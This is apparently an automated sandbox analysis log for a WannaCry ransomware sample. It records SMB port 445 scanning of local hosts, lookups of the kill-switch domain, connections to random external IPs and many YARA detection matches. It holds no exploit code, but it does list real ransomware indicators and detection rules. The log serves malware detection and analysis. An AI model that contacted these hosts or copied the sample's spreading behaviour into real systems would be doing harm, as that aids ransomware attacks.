          Source: global trafficTCP traffic: 192.168.2.86:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.104:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.85:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.105:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.88:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.102:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.87:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.103:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.108:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.89:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.109:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.106:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.107:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.80:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.82:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.100:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.81:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.101:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.84:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.83:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.75:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.115:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.74:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.116:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.77:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.113:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.76:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.114:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.79:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.119:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.78:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.117:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.118:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.71:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.111:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.70:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.112:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.73:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.72:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.110:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.64:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.63:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.66:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.65:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.68:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.67:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.69:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.60:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.62:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.61:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.49:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.53:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.52:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.55:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.54:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.57:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.56:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.59:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.58:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.51:445Jump to behavior
          Source: global trafficTCP traffic: 192.168.2.50:445Jump to behavior
          Source: Ee3RWj3ID9.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

          Networking

          barindex
          Snort IDS alert for network traffic
          Source: TrafficSnort IDS: 2830018 ETPRO TROJAN Observed WannaCry Domain (iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff .com in DNS Lookup) 192.168.2.4:56572 -> 8.8.8.8:53
          Source: TrafficSnort IDS: 2830018 ETPRO TROJAN Observed WannaCry Domain (iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff .com in DNS Lookup) 192.168.2.4:59683 -> 8.8.8.8:53
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.comCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cache-Control: no-cacheHost: ww38.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.comCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cache-Control: no-cacheHost: ww38.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.comConnection: Keep-Alive
          Source: unknownNetwork traffic detected: IP country count 21
          Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49690
          Source: unknownNetwork traffic detected: HTTP traffic on port 49685 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49690 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49684 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49687 -> 443
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 13 Oct 2022 12:53:08 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveServer: nginxVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 13 Oct 2022 12:53:09 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveServer: nginxVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
          Source: unknownTCP traffic detected without corresponding DNS query: 104.212.67.92
          Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
          Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
          Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
          Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
          Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
          Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
          Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
          Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
          Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
          Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
          Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
          Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
          Source: unknownTCP traffic detected without corresponding DNS query: 22.112.92.57
          Source: unknownTCP traffic detected without corresponding DNS query: 152.93.164.24
          Source: unknownTCP traffic detected without corresponding DNS query: 82.159.150.60
          Source: unknownTCP traffic detected without corresponding DNS query: 128.70.6.5
          Source: unknownTCP traffic detected without corresponding DNS query: 101.112.150.223
          Source: unknownTCP traffic detected without corresponding DNS query: 7.155.26.73
          Source: unknownTCP traffic detected without corresponding DNS query: 86.18.106.89
          Source: unknownTCP traffic detected without corresponding DNS query: 157.83.127.34
          Source: unknownTCP traffic detected without corresponding DNS query: 66.245.173.111
          Source: unknownTCP traffic detected without corresponding DNS query: 144.213.131.20
          Source: unknownTCP traffic detected without corresponding DNS query: 84.166.206.203
          Source: unknownTCP traffic detected without corresponding DNS query: 84.30.239.197
          Source: unknownTCP traffic detected without corresponding DNS query: 118.11.54.59
          Source: unknownTCP traffic detected without corresponding DNS query: 68.202.11.27
          Source: unknownTCP traffic detected without corresponding DNS query: 179.135.185.160
          Source: unknownTCP traffic detected without corresponding DNS query: 9.144.43.218
          Source: unknownTCP traffic detected without corresponding DNS query: 65.44.74.67
          Source: unknownTCP traffic detected without corresponding DNS query: 21.247.89.44
          Source: unknownTCP traffic detected without corresponding DNS query: 193.254.239.111
          Source: unknownTCP traffic detected without corresponding DNS query: 195.69.133.197
          Source: unknownTCP traffic detected without corresponding DNS query: 223.225.190.118
          Source: unknownTCP traffic detected without corresponding DNS query: 38.157.20.33
          Source: unknownTCP traffic detected without corresponding DNS query: 64.104.40.138
          Source: unknownTCP traffic detected without corresponding DNS query: 21.195.231.130
          Source: unknownTCP traffic detected without corresponding DNS query: 100.61.131.181
          Source: unknownTCP traffic detected without corresponding DNS query: 102.207.231.61
          Source: unknownTCP traffic detected without corresponding DNS query: 42.34.73.48
          Source: unknownTCP traffic detected without corresponding DNS query: 150.94.153.50
          Source: unknownTCP traffic detected without corresponding DNS query: 48.17.92.96
          Source: unknownTCP traffic detected without corresponding DNS query: 91.219.89.19
          Source: unknownTCP traffic detected without corresponding DNS query: 101.224.153.166
          Source: unknownTCP traffic detected without corresponding DNS query: 128.91.138.1
          Source: unknownTCP traffic detected without corresponding DNS query: 79.56.248.51
          Source: unknownTCP traffic detected without corresponding DNS query: 166.208.112.233
          Source: unknownTCP traffic detected without corresponding DNS query: 194.196.117.106
          Source: unknownTCP traffic detected without corresponding DNS query: 209.117.77.161
          Source: unknownTCP traffic detected without corresponding DNS query: 105.103.2.199
          Source: Ee3RWj3ID9.exe, 00000000.00000002.312375823.0000000000D52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww38.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com/
          Source: Ee3RWj3ID9.exe, 00000000.00000002.312375823.0000000000D52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww38.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com/(
          Source: Ee3RWj3ID9.exe, 00000000.00000002.312375823.0000000000D52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww38.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com/y9X
          Source: Ee3RWj3ID9.exeString found in binary or memory: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com
          Source: Ee3RWj3ID9.exe, 00000000.00000002.312375823.0000000000D52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com/:;P
          Source: Ee3RWj3ID9.exe, 00000001.00000002.575642878.000000000019C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.comJ
          Source: unknownDNS traffic detected: queries for: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.comCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cache-Control: no-cacheHost: ww38.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.comCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cache-Control: no-cacheHost: ww38.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.comConnection: Keep-Alive

          Spam, unwanted Advertisements and Ransom Demands

          barindex
          Detected Wannacry Ransomware
          Source: C:\Windows\tasksche.exeCode function: CreateFileA,GetFileSizeEx,memcmp,GlobalAlloc,_local_unwind2, WANACRY!2_2_004014A6
          Yara detected Wannacry ransomware
          Source: Yara matchFile source: Ee3RWj3ID9.exe, type: SAMPLE
          Source: Yara matchFile source: 1.2.Ee3RWj3ID9.exe.2508948.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Ee3RWj3ID9.exe.24f98c8.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Ee3RWj3ID9.exe.1fd6104.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.Ee3RWj3ID9.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Ee3RWj3ID9.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Ee3RWj3ID9.exe.1fc7084.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Ee3RWj3ID9.exe.2508948.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.0.Ee3RWj3ID9.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Ee3RWj3ID9.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Ee3RWj3ID9.exe.1fd20a4.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Ee3RWj3ID9.exe.25048e8.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Ee3RWj3ID9.exe.1fd6104.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000000.302317167.000000000040F000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.575695707.000000000042E000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.305681909.000000000040F000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.311287084.000000000040F000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.577194979.0000000002508000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.576443116.0000000001FD6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: Ee3RWj3ID9.exe PID: 4740, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: Ee3RWj3ID9.exe PID: 5764, type: MEMORYSTR

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: Ee3RWj3ID9.exe, type: SAMPLEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
          Source: Ee3RWj3ID9.exe, type: SAMPLEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
          Source: Ee3RWj3ID9.exe, type: SAMPLEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
          Source: Ee3RWj3ID9.exe, type: SAMPLEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
          Source: 1.2.Ee3RWj3ID9.exe.24f98c8.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
          Source: 0.0.Ee3RWj3ID9.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
          Source: 0.0.Ee3RWj3ID9.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
          Source: 0.0.Ee3RWj3ID9.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
          Source: 1.2.Ee3RWj3ID9.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
          Source: 1.2.Ee3RWj3ID9.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
          Source: 1.2.Ee3RWj3ID9.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
          Source: 0.2.Ee3RWj3ID9.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
          Source: 0.2.Ee3RWj3ID9.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
          Source: 0.2.Ee3RWj3ID9.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
          Source: 1.2.Ee3RWj3ID9.exe.252b96c.8.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
          Source: 1.2.Ee3RWj3ID9.exe.252b96c.8.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
          Source: 1.2.Ee3RWj3ID9.exe.252b96c.8.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
          Source: 1.2.Ee3RWj3ID9.exe.2508948.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
          Source: 1.2.Ee3RWj3ID9.exe.2508948.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
          Source: 1.2.Ee3RWj3ID9.exe.2508948.9.raw.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
          Source: 1.2.Ee3RWj3ID9.exe.1ff9128.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
          Source: 1.2.Ee3RWj3ID9.exe.1ff9128.5.raw.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
          Source: 1.2.Ee3RWj3ID9.exe.1ff9128.5.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
          Source: 1.0.Ee3RWj3ID9.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
          Source: 1.0.Ee3RWj3ID9.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
          Source: 1.0.Ee3RWj3ID9.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
          Source: 1.2.Ee3RWj3ID9.exe.1fc7084.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
          Source: 1.2.Ee3RWj3ID9.exe.252b96c.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
          Source: 1.2.Ee3RWj3ID9.exe.252b96c.8.raw.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
          Source: 1.2.Ee3RWj3ID9.exe.252b96c.8.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
          Source: 1.2.Ee3RWj3ID9.exe.24f98c8.7.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
          Source: 1.2.Ee3RWj3ID9.exe.24f98c8.7.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
          Source: 2.0.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
          Source: 2.0.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
          Source: 2.0.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
          Source: 0.0.Ee3RWj3ID9.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
          Source: 0.0.Ee3RWj3ID9.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
          Source: 0.0.Ee3RWj3ID9.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
          Source: 0.2.Ee3RWj3ID9.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
          Source: 0.2.Ee3RWj3ID9.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
          Source: 0.2.Ee3RWj3ID9.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
          Source: 1.2.Ee3RWj3ID9.exe.1fd6104.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
          Source: 1.2.Ee3RWj3ID9.exe.1fd6104.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
          Source: 1.2.Ee3RWj3ID9.exe.1fd6104.4.raw.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
          Source: 1.0.Ee3RWj3ID9.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
          Source: 1.0.Ee3RWj3ID9.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
          Source: 1.0.Ee3RWj3ID9.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
          Source: 1.0.Ee3RWj3ID9.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
          Source: 1.0.Ee3RWj3ID9.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
          Source: 1.0.Ee3RWj3ID9.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
          Source: 1.0.Ee3RWj3ID9.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
          Source: 1.2.Ee3RWj3ID9.exe.1ff9128.5.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
          Source: 1.2.Ee3RWj3ID9.exe.1ff9128.5.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
          Source: 1.2.Ee3RWj3ID9.exe.1ff9128.5.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
          Source: 0.2.Ee3RWj3ID9.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
          Source: 0.2.Ee3RWj3ID9.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
          Source: 0.2.Ee3RWj3ID9.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
          Source: 0.2.Ee3RWj3ID9.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
          Source: 1.2.Ee3RWj3ID9.exe.1fc7084.2.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
          Source: 1.2.Ee3RWj3ID9.exe.1fc7084.2.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
          Source: 1.2.Ee3RWj3ID9.exe.1fc7084.2.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
          Source: 1.2.Ee3RWj3ID9.exe.1fc7084.2.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
          Source: 1.2.Ee3RWj3ID9.exe.2508948.9.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
          Source: 1.2.Ee3RWj3ID9.exe.2508948.9.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
          Source: 1.2.Ee3RWj3ID9.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
          Source: 1.2.Ee3RWj3ID9.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
          Source: 1.2.Ee3RWj3ID9.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
          Source: 0.0.Ee3RWj3ID9.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
          Source: 0.0.Ee3RWj3ID9.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
          Source: 0.0.Ee3RWj3ID9.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
          Source: 0.0.Ee3RWj3ID9.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
          Source: 1.2.Ee3RWj3ID9.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
          Source: 1.2.Ee3RWj3ID9.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
          Source: 1.2.Ee3RWj3ID9.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
          Source: 1.2.Ee3RWj3ID9.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
          Source: 1.2.Ee3RWj3ID9.exe.1fd20a4.3.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
          Source: 1.2.Ee3RWj3ID9.exe.1fd20a4.3.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
          Source: 2.2.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
          Source: 2.2.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
          Source: 2.2.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
          Source: 1.2.Ee3RWj3ID9.exe.25048e8.6.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
          Source: 1.2.Ee3RWj3ID9.exe.25048e8.6.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
          Source: 1.2.Ee3RWj3ID9.exe.1fd6104.4.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
